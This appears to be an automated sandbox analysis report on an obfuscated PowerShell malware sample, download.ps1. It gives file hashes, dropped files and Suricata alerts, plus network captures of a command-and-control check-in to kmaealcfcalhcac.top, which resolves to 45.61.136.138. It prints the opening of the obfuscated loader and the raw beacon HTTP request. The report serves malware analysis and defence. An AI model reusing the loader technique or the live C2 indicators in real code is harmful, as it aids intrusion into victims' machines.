                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                install.msiGet hashmaliciousUnknownBrowse
                                                                                                • 193.32.177.34
                                                                                                install.msiGet hashmaliciousUnknownBrowse
                                                                                                • 193.32.177.34
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:@...e...........................................................

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5pifqfc.ytl.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvvc2zn0.154.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjmlvacs.0ds.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzpk3b5y.f4x.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6222
                                                                                                Entropy (8bit):3.748267629392799
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:I3QkUeCiGK/kvhkvCCtIaanThurHeranyhu6HeE:IgkCqCnT0pny0K
                                                                                                MD5:B6D4EA29FFB9704E7555BA3BE694F146
                                                                                                SHA1:A09737D0880DBE375BA3509888B5962300757729
                                                                                                SHA-256:ACDB58492D0DD5DF19AFEABB369B1F5FD71693393D344F9116F310A54031E983
                                                                                                SHA-512:F60800CA0A712FFB828423F11BAFA33995E30B5C473BA226B0DE14E348AB83DF89680528E2CA583BBCBE22C26565251BE3DA059DFDEBBE532F5FC04D43D2584A
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...;.}.S......q.d..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S.....uk.d....q.d......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.+Z1H....B......................A!.A.p.p.D.a.t.a...B.V.1.....+Z3H..Roaming.@......"S.+Z3H....D.....................au..R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.+Z1H....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....+Z-...Windows.@......"S.+Z-.....F......................s..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`+Zr.....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`+Zr.....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.+Zq.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.+Z8H....i...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQ8KFEHIC53C5TLJA17G.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6222
                                                                                                Entropy (8bit):3.748267629392799
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:I3QkUeCiGK/kvhkvCCtIaanThurHeranyhu6HeE:IgkCqCnT0pny0K
                                                                                                MD5:B6D4EA29FFB9704E7555BA3BE694F146
                                                                                                SHA1:A09737D0880DBE375BA3509888B5962300757729
                                                                                                SHA-256:ACDB58492D0DD5DF19AFEABB369B1F5FD71693393D344F9116F310A54031E983
                                                                                                SHA-512:F60800CA0A712FFB828423F11BAFA33995E30B5C473BA226B0DE14E348AB83DF89680528E2CA583BBCBE22C26565251BE3DA059DFDEBBE532F5FC04D43D2584A
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...;.}.S......q.d..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S.....uk.d....q.d......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.+Z1H....B......................A!.A.p.p.D.a.t.a...B.V.1.....+Z3H..Roaming.@......"S.+Z3H....D.....................au..R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.+Z1H....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....+Z-...Windows.@......"S.+Z-.....F......................s..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`+Zr.....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`+Zr.....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.+Zq.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.+Z8H....i...........

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:ASCII text, with very long lines (10391), with CRLF line terminators
                                                                                                Entropy (8bit):5.990539557615101
                                                                                                TrID:
                                                                                                  File name:download.ps1
                                                                                                  File size:18'803 bytes
                                                                                                  MD5:a9b2be9576b870b7a18ed374336f68ca
                                                                                                  SHA1:62662313b37a4daf2f209495d7217717f88eab45
                                                                                                  SHA256:501a309ab708ccd57fe2b49aa7f7f59d694550549070f13b3031e1dd4e46108a
                                                                                                  SHA512:d3ce90218a8a016ffd445fcb3ad9c619d8b78adf5b4590c61624a1529c40722d1a6dee2b4639b473c2424009681a6df4ffa6a84cb3119d0f08112effe4300577
                                                                                                  SSDEEP:384:Fqp8upQCpZthqQWMV6bflS46qFI2QdeXuuC3Zgi8dNR6paWc9Cdgv:AppNbqQW5bthpFI2QcfCJB66pazCC
                                                                                                  TLSH:3B827D706BCED5A5C158D1492F237C282F2331AFC4DB6E40B76DD1C123AE544A949F82
                                                                                                  File Content Preview:$wyjhouem=$executioncontext;$reatereratalanbeatarinenisbere = -join (0..54 | ForEach-Object {[char]([int]"00000080000000790000008400000077000000830000008100000083000000820000008200000077000000830000007500000076000000820000007900000083000000810000008300000

                                                                                                  File Icon

                                                                                                  Icon Hash:3270d6baae77db44

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2025-01-11T10:01:52.431349+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.204972345.61.136.13880TCP
                                                                                                  2025-01-11T10:01:52.431349+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.204972345.61.136.13880TCP
                                                                                                  2025-01-11T10:01:52.800335+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.2049724142.250.190.13280TCP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 11, 2025 10:01:52.006145000 CET4972380192.168.11.2045.61.136.138
                                                                                                  Jan 11, 2025 10:01:52.177622080 CET804972345.61.136.138192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.177831888 CET4972380192.168.11.2045.61.136.138
                                                                                                  Jan 11, 2025 10:01:52.181845903 CET4972380192.168.11.2045.61.136.138
                                                                                                  Jan 11, 2025 10:01:52.353065014 CET804972345.61.136.138192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.382311106 CET804972345.61.136.138192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.431349039 CET4972380192.168.11.2045.61.136.138
                                                                                                  Jan 11, 2025 10:01:52.507924080 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.626184940 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.626382113 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.626526117 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.745179892 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800070047 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800091028 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800206900 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800321102 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800334930 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.800481081 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800555944 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800590992 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.800719976 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800787926 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.800792933 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800919056 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.800997019 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.801021099 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.801301956 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.918761015 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.918979883 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.919194937 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.923068047 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.923156977 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.923460007 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.931696892 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.931791067 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.931962967 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.940326929 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.940408945 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.940579891 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.948944092 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.949043989 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.949290037 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.957596064 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.957695961 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.957873106 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.966218948 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.966312885 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.966502905 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.975018978 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.975125074 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.975353956 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.983495951 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.983608961 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.983870983 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:52.992119074 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.992208958 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.992450953 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.037617922 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.037703037 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.037887096 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.041898012 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.041965008 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.042257071 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.050561905 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.050669909 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.050887108 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.058087111 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.058101892 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.058465004 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.065536022 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.065617085 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.065968037 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.073082924 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.073127031 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.073390961 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.080459118 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.080568075 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.080765009 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.087816954 CET8049724142.250.190.132192.168.11.20
                                                                                                  Jan 11, 2025 10:01:53.134255886 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.319523096 CET4972480192.168.11.20142.250.190.132
                                                                                                  Jan 11, 2025 10:01:53.320171118 CET4972380192.168.11.2045.61.136.138

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 11, 2025 10:01:51.825434923 CET5512353192.168.11.201.1.1.1
                                                                                                  Jan 11, 2025 10:01:51.997431040 CET53551231.1.1.1192.168.11.20
                                                                                                  Jan 11, 2025 10:01:52.383744955 CET5670053192.168.11.201.1.1.1
                                                                                                  Jan 11, 2025 10:01:52.502460957 CET53567001.1.1.1192.168.11.20

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 11, 2025 10:01:51.825434923 CET192.168.11.201.1.1.10xa085Standard query (0)kmaealcfcalhcac.topA (IP address)IN (0x0001)false
                                                                                                  Jan 11, 2025 10:01:52.383744955 CET192.168.11.201.1.1.10xf8bdStandard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 11, 2025 10:01:51.997431040 CET1.1.1.1192.168.11.200xa085No error (0)kmaealcfcalhcac.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                  Jan 11, 2025 10:01:52.502460957 CET1.1.1.1192.168.11.200xf8bdNo error (0)www.google.com142.250.190.132A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • kmaealcfcalhcac.top
                                                                                                  • www.google.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.11.204972345.61.136.138808416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 11, 2025 10:01:52.181845903 CET215OUTGET /2xg70oiywchtr.php?id=computer&key=72557916474&s=527 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                  Host: kmaealcfcalhcac.top
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 11, 2025 10:01:52.382311106 CET166INHTTP/1.1 302 Found
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 11 Jan 2025 09:01:52 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: keep-alive
                                                                                                  Location: http://www.google.com


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.11.2049724142.250.190.132808416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 11, 2025 10:01:52.626526117 CET159OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                  Host: www.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 11, 2025 10:01:52.800070047 CET1289INHTTP/1.1 200 OK
                                                                                                  Date: Sat, 11 Jan 2025 09:01:52 GMT
                                                                                                  Expires: -1
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-WU9b8b6zmekfMYI_6lo8JQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                  Server: gws
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Set-Cookie: AEC=AZ6Zc-XgjIeEkjuNrHFYk61LQFL5Zk9wSjpGKTzTQ86qneftZAP9mJHBKA; expires=Thu, 10-Jul-2025 09:01:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                  Set-Cookie: NID=520=Ua8oiLJwGZV_Jp6I5kB_ewSMUEEzuq8n7hrD3dGoJYblAkoAlqownVYyxVnOlceBw8T4cBHpIjEv-ypcniR2QRkVOHGrbXL22oQcRH8GmbcYOCF-v86voSOxqVjL-imILTVDzj3xHDiKQZWbIZwpYsnmSlTR7EtLpdX3HNVv2BXgSIMTSwwCJA3n8oqy1JXhn2lj2rT2BA; expires=Sun, 13-Jul-2025 09:01:52 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                  Accept-Ranges: none
                                                                                                  Vary: Accept-Encoding
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Data Raw: 35 65 31 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f
                                                                                                  Data Ascii: 5e1a<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to
                                                                                                  Jan 11, 2025 10:01:52.800091028 CET1289INData Raw: 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d
                                                                                                  Data Ascii: help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128d
                                                                                                  Jan 11, 2025 10:01:52.800206900 CET1289INData Raw: 34 2c 32 34 2c 36 35 30 2c 33 35 2c 32 33 2c 33 39 39 2c 38 2c 32 31 36 2c 31 31 2c 31 35 33 2c 32 2c 32 2c 33 33 36 2c 38 33 34 2c 34 36 34 2c 33 33 31 2c 32 34 35 2c 31 35 31 2c 32 37 32 2c 32 2c 38 37 2c 34 33 30 2c 32 2c 37 2c 31 2c 32 34 36
                                                                                                  Data Ascii: 4,24,650,35,23,399,8,216,11,153,2,2,336,834,464,331,245,151,272,2,87,430,2,7,1,246,2,26,353,2,61,180,906,249,142,603,60,183,224,122,114,455,55,1,777,258,220,1147,1285,190,1,662,353,648,2,6,652,16,319,354,124,1,926,1078,2,49,403,74,164,3,418,64
                                                                                                  Jan 11, 2025 10:01:52.800321102 CET1289INData Raw: 74 79 70 3d 69 26 63 74 3d 22 2b 53 74 72 69 6e 67 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 63 29 7d 3b 6c 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b
                                                                                                  Data Ascii: typ=i&ct="+String(a)+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.
                                                                                                  Jan 11, 2025 10:01:52.800481081 CET1289INData Raw: 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e
                                                                                                  Data Ascii: istener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px
                                                                                                  Jan 11, 2025 10:01:52.800555944 CET1289INData Raw: 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68
                                                                                                  Data Ascii: 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;p
                                                                                                  Jan 11, 2025 10:01:52.800719976 CET1289INData Raw: 7a 74 2c 2e 67 62 67 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36 2c 73 70
